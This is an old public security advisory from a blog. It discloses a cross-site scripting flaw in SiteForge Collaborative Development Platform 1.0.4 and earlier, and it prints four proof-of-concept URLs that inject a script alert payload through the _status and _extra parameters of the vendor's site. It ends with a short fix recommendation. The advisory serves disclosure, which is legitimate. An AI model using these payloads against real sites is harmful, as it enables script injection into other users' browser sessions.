by r0t,der4444,cembo,VietMafia

Thursday, June 15, 2006

SiteForge Collaborative Development Platform XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sitelliteforge.com/
affected versions:1.0.4 and prior
###############################################

Vuln. Description:

SiteForge Collaborative Development Platform contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "_status","_extra1","_extra2","_extra3" paramters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_status=%3Cscript%3Ealer
t('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_extra1=%3Cscript%3Ealert(
'r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=%3Cscript%3
Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=&_extra2=%3
Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew